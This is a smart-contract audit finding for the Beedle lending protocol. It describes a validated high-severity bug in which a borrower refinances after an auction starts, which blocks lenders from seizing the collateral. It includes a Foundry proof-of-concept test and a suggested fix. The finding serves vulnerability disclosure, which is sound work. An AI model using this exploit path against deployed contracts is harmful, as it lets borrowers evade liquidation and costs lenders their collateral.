Beedle - Oracle free perpetual lending
BeedleFi
DeFiFoundry
20,000 USDC
View results
Previous Next
Submission Details
Severity: high
Valid

Refinancing prevents seizing

trtrth

Summary

Borrower could prevent his loan from being seized by refinancing

Vulnerability Details

In refinance logics, the loan's auction timestamp is to max uint256, which is revert condition in seize logic.

https://github.com/Cyfrin/2023-07-beedle/blob/658e046bda8b010a5b82d2d85e824f3823602d27/src/Lender.sol#L692
https://github.com/Cyfrin/2023-07-beedle/blob/658e046bda8b010a5b82d2d85e824f3823602d27/src/Lender.sol#L554-L555

PoC

function test_seizePrevention() public {
test_startAuction();
vm.warp(block.timestamp + 2 days);
// refinance here
vm.startPrank(borrower);
Refinance memory r = Refinance({
loanId: 0,
poolId: lender.getPoolId(
lender1,
address(loanToken),
address(collateralToken)
),
debt: 100 * 10 ** 18,
collateral: 100 * 10 ** 18
});
Refinance[] memory rs = new Refinance[](1);
rs[0] = r;
lender.refinance(rs);
vm.startPrank(lender2);
uint256[] memory loanIds = new uint256[](1);
loanIds[0] = 0;
vm.expectRevert();
lender.seizeLoan(loanIds);
}

Impact

Borrower could refinance to prevent his loan from being seized => Lender could not seize loan to get collateral from borrower

Tools Used

Foundry

Recommendations

Not allow borrower to refinance after auction period by adding this line in refinance function:
if (block.timestamp > loan.auctionStartTimestamp + loan.auctionLength) revert AuctionEnded();

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.